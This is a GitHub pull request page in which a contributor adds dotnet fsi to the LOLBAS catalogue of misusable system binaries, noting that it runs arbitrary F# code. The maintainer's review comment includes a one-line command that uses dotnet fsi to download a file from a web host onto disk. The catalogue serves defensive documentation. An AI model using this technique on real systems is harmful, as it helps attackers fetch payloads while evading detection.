Skip to content

Conversation

YamAlon
Copy link
Contributor

@YamAlon YamAlon commented Feb 23, 2023

Fsi allows the user to run arbitrary f# code.
Works on any os with .net core 3+ with .net SDK.

It might also work on windows 7 as it can work on .net core 2.2 (officially on .net core 3) but it's not well documented so I couldn't write it with confidence.

YamAlon and others added 2 commits February 23, 2023 22:40
Fsi allows the user to run arbitrary f# code.
Works on any os with .net core 3+ with .net SDK.

It might also work on windows 7 as it can work on .net core 2.2 (officially on .net core 3) but it's not well documented so I couldn't write it with confidence.
@wietze wietze self-requested a review February 25, 2023 20:08
Copy link
Member

@wietze wietze left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Great find, got this to download a file to disk via
echo System.IO.File.WriteAllText("hi.tmp", (new System.Net.WebClient()).DownloadString("https://example.org/"));; | dotnet fsi.

Thanks for contributing!

@wietze wietze merged commit 8283b4b into LOLBAS-Project:master Feb 25, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

2 participants